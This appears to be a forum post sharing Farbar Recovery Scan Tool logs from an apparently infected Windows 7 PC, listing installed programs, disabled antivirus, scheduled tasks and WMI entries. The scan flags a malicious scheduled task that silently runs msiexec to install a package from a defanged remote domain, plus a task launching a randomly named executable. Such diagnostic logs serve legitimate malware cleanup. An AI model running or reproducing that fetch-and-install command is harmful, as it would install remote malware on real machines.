2019-02-25 20:26 - 2018-12-05 21:48 - 000000000 ____D C:\Users\Michael\AppData\Roaming\DAEMON Tools Lite
2019-02-25 19:31 - 2018-11-13 00:14 - 000000000 ____D C:\Users\Michael\AppData\Local\ElevatedDiagnostics
2019-02-23 21:28 - 2018-11-13 13:32 - 000000000 ____D C:\Games
2019-02-23 21:10 - 2018-11-13 12:18 - 000000000 ____D C:\Windows\pss
2019-02-23 17:11 - 2009-07-13 22:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2019-02-21 18:05 - 2018-11-13 00:11 - 000108360 _____ C:\Users\Michael\AppData\Local\GDIPFONTCACHEV1.DAT
2019-02-20 23:40 - 2018-11-13 12:29 - 000000000 ____D C:\Users\Michael\AppData\Local\Google
2019-02-20 23:39 - 2018-11-13 12:29 - 000000000 ____D C:\Program Files (x86)\Google
2019-02-20 23:35 - 2018-11-13 12:30 - 000003534 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2019-02-20 23:35 - 2018-11-13 12:29 - 000003406 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2019-02-20 23:34 - 2009-07-13 23:45 - 000414192 _____ C:\Windows\system32\FNTCACHE.DAT
2019-02-20 23:20 - 2018-11-12 17:59 - 000000000 ____D C:\Windows\Panther
2019-02-20 23:08 - 2018-11-13 00:07 - 000001431 _____ C:\Users\Michael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-02-20 23:08 - 2018-11-13 00:07 - 000001397 _____ C:\Users\Michael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2019-02-20 22:21 - 2018-11-13 00:07 - 000000000 ____D C:\Users\Michael
2019-02-20 21:48 - 2018-11-13 14:28 - 000000000 ____D C:\Users\Michael\AppData\Roaming\WinRAR
2019-02-20 21:48 - 2018-11-13 14:28 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2019-02-20 21:48 - 2018-11-13 14:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2019-02-02 13:42 - 2011-04-12 04:20 - 000000000 ____D C:\Windows\ShellNew
2019-02-02 13:42 - 2009-07-13 22:20 - 000000000 ____D C:\Program Files\Common Files\Microsoft Shared
2019-02-02 13:41 - 2009-07-14 00:32 - 000000000 ____D C:\Program Files (x86)\MSBuild
2019-02-02 13:40 - 2009-07-13 22:20 - 000000000 ____D C:\Program Files\Common Files\System
2019-02-02 13:40 - 2009-07-13 21:34 - 000000478 _____ C:\Windows\win.ini
2019-02-02 06:30 - 2018-11-13 12:58 - 000000000 ____D C:\ProgramData\Package Cache
2019-02-01 20:23 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\LiveKernelReports
2019-02-01 18:24 - 2018-12-05 22:02 - 001649848 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2019-02-01 17:47 - 2018-11-13 14:28 - 000000000 ____D C:\Program Files (x86)\WinRAR

==================== Files in the root of some directories =======

2019-02-20 22:20 - 2019-02-20 22:21 - 006161408 _____ () C:\Users\Michael\AppData\Local\dump007.dat
2019-02-20 22:03 - 2019-02-20 22:03 - 000000003 _____ () C:\Users\Michael\AppData\Local\wbem.ini

Some files in TEMP:
====================
2019-02-25 23:03 - 2019-02-28 20:43 - 000000000 ____D () C:\Users\Michael\AppData\Local\Temp\ImagingEngine.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\dllhost.exe => File is digitally signed
C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2019-02-22 00:32

==================== End of FRST.txt ============================

#8

Here goes the other one:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28.02.2019 01
Ran by Michael (01-03-2019 14:02:21)
Running from C:\Users\Michael\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2018-11-13 05:07:08)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrador (S-1-5-21-3080345679-4159888177-3250997579-500 - Administrator - Disabled)
Invitado (S-1-5-21-3080345679-4159888177-3250997579-501 - Limited - Disabled)
Michael (S-1-5-21-3080345679-4159888177-3250997579-1000 - Administrator - Enabled) => C:\Users\Michael

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC - Español (HKLM-x32\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 19.010.20098 - Adobe Systems Incorporated)
Application Verifier x64 External Package (HKLM\...\{B27BC1FC-8474-9E32-73C2-6F7CD58AD1E3}) (Version: 10.1.17763.132 - Microsoft) Hidden
Biblioteca de autenticación de AD para SQL Server (HKLM\...\{89F68765-728E-41C6-949F-8E3328E38F65}) (Version: 13.1.4001.0 - Microsoft Corporation) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.29 - Piriform)
ClickOnce Bootstrapper Package for Microsoft .NET Framework (HKLM-x32\...\{D256A5B9-68DA-4F6C-A447-A93E5639A46D}) (Version: 4.7.03083 - Microsoft Corporation) Hidden
Compresor WinRAR (HKLM-x32\...\WinRAR archiver) (Version:  - )
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.40.1.0127 - DT Soft Ltd)
DiagnosticsHub_CollectionService (HKLM\...\{440C5592-4EA5-4772-B256-969D66068843}) (Version: 15.9.28016 - Microsoft Corporation) Hidden
Discord (HKU\S-1-5-21-3080345679-4159888177-3250997579-1000\...\Discord) (Version: 0.0.304 - Discord Inc.)
Entity Framework 6.2.0 Tools  for Visual Studio 2017 (HKLM-x32\...\{B843915F-00A1-44B1-994C-1AE0A6400AE3}) (Version: 6.2.61807.0 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.119 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.115 - Google Inc.) Hidden
HiJackThis (HKLM-x32\...\{45A66726-69BC-466B-A7A4-12FCBA4883D7}) (Version: 1.0.0 - Trend Micro)
icecap_collection_neutral (HKLM-x32\...\{A3B4D258-74E1-49D6-9A86-2DFEFEE48DEC}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collection_x64 (HKLM\...\{E524832A-C567-499A-8872-0D79596E4DEE}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collectionresources (HKLM-x32\...\{BD49AE09-95E2-4E90-A867-419F89195D45}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
icecap_collectionresourcesx64 (HKLM-x32\...\{E15790DB-C145-4862-83CD-7E0173E0D04F}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
IIS 10.0 Express (HKLM\...\{4E0AF984-1437-42DC-A8E4-A6EE920DDFAF}) (Version: 10.0.1743 - Microsoft Corporation)
IIS Express Application Compatibility Database for x64 (HKLM\...\{08274920-8908-45c2-9258-8ad67ff77b09}.sdb) (Version:  - ) Hidden
IIS Express Application Compatibility Database for x86 (HKLM\...\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb) (Version:  - ) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
IntelliTraceProfilerProxy (HKLM-x32\...\{ACBAA378-519A-441D-9349-C0AAD8DEAD04}) (Version: 15.0.17289.01 - Microsoft Corporation) Hidden
Java 8 Update 201 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180201F0}) (Version: 8.0.2010.9 - Oracle Corporation)
Java(TM) SE Development Kit 11.0.2 (64-bit) (HKLM\...\{07E85AEA-1F8D-5F49-8CC8-319389751152}) (Version: 11.0.2.0 - Oracle Corporation)
JCreator LE 5.00 (HKLM-x32\...\JCreator LE_is1) (Version:  - Xinox Software)
Kits Configuration Installer (HKLM-x32\...\{29B915AE-013F-151F-3E61-67F7363C3A09}) (Version: 10.1.17763.132 - Microsoft) Hidden
Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes)
Microsoft .NET Core SDK - 2.1.202 (x64) (HKLM-x32\...\{06b884b0-4947-4439-859f-098e431012d6}) (Version: 2.1.202 - Microsoft Corporation)
Microsoft .NET Core SDK 2.1.503 (x64) (HKLM-x32\...\{ce5280a9-88d6-42e4-90bc-8399a3f94460}) (Version: 2.1.503 - Microsoft Corporation)
Microsoft .NET Framework 4.7.2 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.7.03062 - Microsoft Corporation)
Microsoft .NET Framework 4.7.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.03062 - Microsoft Corporation)
Microsoft Azure Authoring Tools - v2.9.5.3 (HKLM\...\{086C537B-DE1A-4A11-8441-6AAF076174B8}) (Version: 2.9.8699.20 - Microsoft Corporation)
Microsoft Azure Compute Emulator - v2.9.5.3 (HKLM\...\Microsoft Azure Compute Emulator - v2.9.5.3) (Version: 2.9.8699.20 - Microsoft Corporation)
Microsoft Azure Libraries for .NET – v2.9 (HKLM\...\{C5C91AA6-3E83-430E-8B7A-6B790083F28D}) (Version: 3.0.0127.060 - Microsoft Corporation)
Microsoft Azure Storage Emulator - v5.7 (HKLM-x32\...\Microsoft Azure Storage Emulator - v5.7) (Version: 5.7.18218.1723 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{15A835D2-48C4-4C13-8D7F-C2742104D2D1}) (Version: 11.3.6518.0 - Microsoft Corporation)
Microsoft SQL Server 2016 LocalDB (HKLM\...\{0CA7D28F-F81A-42A2-B14B-CABE07F04282}) (Version: 13.1.4001.0 - Microsoft Corporation)
Microsoft System CLR Types para SQL Server vNext CTP1.6 (HKLM\...\{423815CE-0004-481F-B3D3-7574EE25924A}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft System CLR Types para SQL Server vNext CTP1.6 (HKLM-x32\...\{E4839F78-C3C2-493F-BB2F-472F6BBD2ED6}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27024 (HKLM-x32\...\{5fb2083a-f3cc-4b78-93ff-bd9788b5de01}) (Version: 14.16.27024.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27024 (HKLM-x32\...\{2ff11a2a-f7ac-4a6c-8cd4-c7bb974f3642}) (Version: 14.16.27024.1 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1095.110 - Microsoft Corporation)
Microsoft Web Deploy 4.0 (HKLM\...\{AEA6EBD0-7E59-46C0-8B5E-1715BC58DC45}) (Version: 10.0.1994 - Microsoft Corporation)
MotioninJoy Gamepad tool 0.7.1001 (HKLM\...\{330DAC67-5B62-452A-A0E4-6B4A5923940F}_is1) (Version: 0.7.1001 - www.motioninjoy.com)
MSI Development Tools (HKLM-x32\...\{6C961B30-A670-8A05-3BFE-3947E84DD4E4}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
NVIDIA Controlador de 3D Vision 364.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 364.72 - NVIDIA Corporation)
NVIDIA Controlador de audio HD 1.3.34.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.4 - NVIDIA Corporation)
NVIDIA Controlador de gráficos 364.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 364.72 - NVIDIA Corporation)
NVIDIA Controlador de la controladora 3D Vision 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
NVIDIA Software del sistema PhysX 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Panel de control de NVIDIA 364.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 364.72 - NVIDIA Corporation) Hidden
Paquete acumulativo de Intellisense de Microsoft .NET Framework para Visual Studio (español) (HKLM-x32\...\{A8F7ACD7-A4E4-42FD-A978-DB6488DD6B3A}) (Version: 4.7.02558 - Microsoft Corporation) Hidden
Paquete de compatibilidad redirigido de documentación de Microsoft .NET Framework 4.7.1 (español) (HKLM-x32\...\{927FF4FD-8E47-4022-8545-22FD78FBC2AB}) (Version: 4.7.02558 - Microsoft Corporation) Hidden
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2) (Version:  - )
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.75.827.2013 - Realtek)
RegSeeker (HKLM-x32\...\RegSeeker) (Version: 2.55.0607 - HoverDesk)
Resident Evil HD Remaster (HKLM-x32\...\Resident Evil HD Remaster_is1) (Version:  - )
RuneScape Launcher 2.2.4 (HKLM\...\RuneScape Launcher_is1) (Version: 2.2.4 - Jagex Ltd)
ScpToolkit (HKLM\...\{AC052048-9828-45E3-872B-04CE30A3B58B}) (Version: 1.6.238.16010 - Nefarius Software Solutions)
SDK ARM Additions (HKLM-x32\...\{0B5D6FB7-05A5-271B-5B99-82384219A471}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{4A5F6E94-7967-A333-8231-CA9AF35E03BD}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SDK de Microsoft .NET Framework 4.6.1 (español) (HKLM-x32\...\{07570008-8840-4A14-A752-1367157138A5}) (Version: 4.6.01055 - Microsoft Corporation) Hidden
TypeScript SDK (HKLM-x32\...\{3CBDDAE8-99AE-4168-BDA7-8352BF15BE73}) (Version: 3.1.2.0 - Microsoft Corporation) Hidden
TypeScript SDK (HKLM-x32\...\{CFA1F87E-EF2B-4785-812C-4BEEA22CFD06}) (Version: 2.3.5.0 - Microsoft Corporation) Hidden
Unity (HKLM-x32\...\Unity) (Version: 2018.3.0f2 - Unity Technologies ApS)
Universal CRT Extension SDK (HKLM-x32\...\{7D225043-6CC5-7B56-11DD-AFF90E4C1C0C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{CB19DBA2-C210-5646-9522-695A1317CD34}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{0460C87B-7F4C-3170-FAC9-B7A6AE5CE4E9}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{5F577A45-3C65-352B-061D-D6A57F05402C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{3B588BBE-EB02-D1B2-5CD5-7DB85AD8A3E7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{D2DC1EDF-EE04-9B5F-BDD7-06645D859EC3}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{CE83D0BD-418A-F3D1-D6CE-687E96D1EBD0}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
vcpp_crt.redist.clickonce (HKLM-x32\...\{32DF9B1B-E622-4385-99E0-02461A428363}) (Version: 14.16.27012 - Microsoft Corporation) Hidden
Visual Studio Community 2017 (HKLM-x32\...\031fe2fc) (Version: 15.9.28307.344 - Microsoft Corporation)
VS Immersive Activate Helper (HKLM-x32\...\{54FBC9A9-CCA1-417E-ACA6-203A32A39F37}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS JIT Debugger (HKLM\...\{4B816AD0-D12B-498A-8148-7CBE3ED328DE}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS WCF Debugging (HKLM\...\{14AF842C-675E-4268-B493-EB76D9B465A8}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
vs_BlendMsi (HKLM-x32\...\{C5D83E0F-12E7-4BA3-98E6-DAE0E73B5BF9}) (Version: 15.0.27205 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsi (HKLM-x32\...\{A68D7884-F036-4A0D-AE1A-410E0311E135}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsires (HKLM-x32\...\{91DDDFB5-1782-48C2-BA2A-8F4D9DE39D27}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncesigntoolmsi (HKLM-x32\...\{6A1ECF65-2CBF-4B33-9D4A-D1C0A0E5FE45}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{340226AB-D0EF-4715-A331-AB3A416B5018}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx64 (HKLM\...\{B6BAC9A6-A70D-4E4D-B90A-7EE2B336E090}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx86 (HKLM-x32\...\{3161DA68-DD37-4798-82DB-B3A0BD6BA233}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{E70CC1B8-7ED5-4495-9C52-603FE87F38F4}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_SQLClickOnceBootstrappermsi (HKLM-x32\...\{5779B6DD-604A-41CE-BC3D-9D4BDDA22AD2}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.5.1 (HKLM\...\VulkanRT1.0.5.1) (Version: 1.0.5.1 - LunarG, Inc.)
WinAppDeploy (HKLM-x32\...\{716AE8F2-1BE3-7657-DF6B-F23DEEC75AF9}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Windows SDK AddOn (HKLM-x32\...\{1E76DFA7-96F3-4281-8E41-8A226C3E42EE}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.17763.132 (HKLM-x32\...\{5fe95b9d-9219-4d8b-a031-71323ae48a81}) (Version: 10.1.17763.132 - Microsoft Corporation)
WinRAR 5.70 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.70.1 - win.rar GmbH)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{00B12DF9-5428-9406-DE2C-8E8A1A062B05}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{E82A4A6C-C21C-35FE-B805-3E44318F6D63}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{7E898893-9C42-A572-7F57-FDE55CE812F7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E8B1CB29-5C24-D882-3CEF-F8A7263BC63D}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{F6F11150-93DE-0507-FCA0-F746E0207017}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{8329C3A0-8582-D1C2-67FF-800654BFDF45}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{771C9DEF-7C0B-85DA-6426-7A20F06BEC94}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{B047C746-63E8-41C7-A5C0-7ABD390CF3E6}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{0063AF94-397B-9C64-1C71-D404B27C5D96}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Xamarin PCL Profiles v1.0.9 (HKLM-x32\...\{5E6844AB-A867-419C-A376-B12B574AA5F7}) (Version: 1.0.9.0 - Xamarin) Hidden
Xamarin Remoted iOS Simulator (HKLM-x32\...\{5DE98E3F-9A5C-48B7-B039-8E0FB2D68AEA}) (Version: 1.3.0.8 - Xamarin) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-02-19] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-02-19] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-02-19] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-02-19] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2016-03-21] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-02-19] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-02-19] (win.rar GmbH -> Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {19542A6A-D51F-4FDD-A211-C054D88E3E01} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe (Piriform Ltd -> Piriform Ltd)
Task: {2E5A82F9-74BA-4BBA-80F7-7988323D2436} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {36862642-B4E0-4EE1-8C8A-BAB564791EF6} - System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150} => "msiexec" -q -i hxxps://refreshnerer711.info/mp2FA19Hb.GWj <==== ATTENTION
Task: {44D5472E-7EC8-4C26-8644-3C0782EE11D1} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {5D11E411-A841-43AC-AF9A-BFF0D70F52BB} - System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863} => C:\Program Files (x86)\Common Files\AiuuuByEYaObo.exe
Task: {60E94CE0-3E18-4569-B0E1-70DED1E5522E} - System32\Tasks\updater => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe (Nefarius Software Solutions) [File not signed]
Task: {D16DA545-16D0-4CB3-A708-D018659DF49E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]

==================== Loaded Modules (Whitelisted) ==============

2016-01-10 13:52 - 2016-01-10 13:52 - 000389632 _____ (Scarlet.Crush Productions) [File not signed] C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe
2019-02-23 17:10 - 2019-02-23 17:10 - 000041472 _____ (Scarlet.Crush Productions) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\ScpService\69414e848c0008fd8e9a0e21225abd93\ScpService.ni.exe
2019-02-23 17:10 - 2019-02-23 17:10 - 000953344 _____ (The Apache Software Foundation) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\log4net\6ddfb2b833726c76267d06317ffe52d6\log4net.ni.dll
2019-02-23 17:10 - 2019-02-23 17:10 - 001142272 _____ (Scarlet.Crush Productions) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\ScpControl\908d05b469ccc28985c64afd86a6400f\ScpControl.ni.dll
2019-02-23 17:11 - 2019-02-23 17:11 - 000147968 _____ (michaelnoonan) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\WindowsInput\00383e8a9f5efe3994c0ab8d91747527\WindowsInput.ni.dll
